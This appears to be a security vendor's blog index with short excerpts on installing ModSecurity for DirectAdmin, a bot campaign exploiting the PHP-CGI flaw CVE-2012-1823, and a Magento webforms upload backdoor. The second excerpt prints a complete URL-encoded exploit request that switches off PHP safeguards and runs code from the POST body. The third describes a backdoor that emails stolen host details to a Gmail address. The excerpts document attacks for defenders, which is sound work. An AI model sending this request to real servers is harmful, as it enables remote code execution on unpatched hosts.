Install ModSecurity to Directadmin with Custombuild 2.x

Prerequisite If you dont have custombuild or version is 1.x, you need first upgrade to custombuild 2.x. Upgrade instruction https://help.directadmin.com/item.php?id=555 Update Custombuild Update custombuild: Configuration Edit options.conf file and change these lines to below: Build ClamAV scanner Optional can use Malware Expert ClamAV Signatures and Linux Malware Detect Build ModSecurity Mod_Security Rules In options.conf possible … Read more

Bot Network Scanners Activated

During analysis of our logs we noticed that an automated attack against PHP is going on, using a vulnerability in PHP. Attacker is trying to make use of CVE-2012-1823, this only applies if your PHP is used in CGI mode (mod_php is not vulnerable to this). POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E Decoding the URL gives: Using -d parameter … Read more

Magento Webforms Upload Vulnerability

In ModSecurity auditlog we found magento webforms upload vulnerability. Looking better POST payload, found this image.phtml script, which first uploaded to customer website. If index.php / image.phtml file success uploaded, it can access from www and executed! image.phtml   First it send email to fileputcontent@gmail.com notify details like Hostname, URL, IP:   Then it try … Read more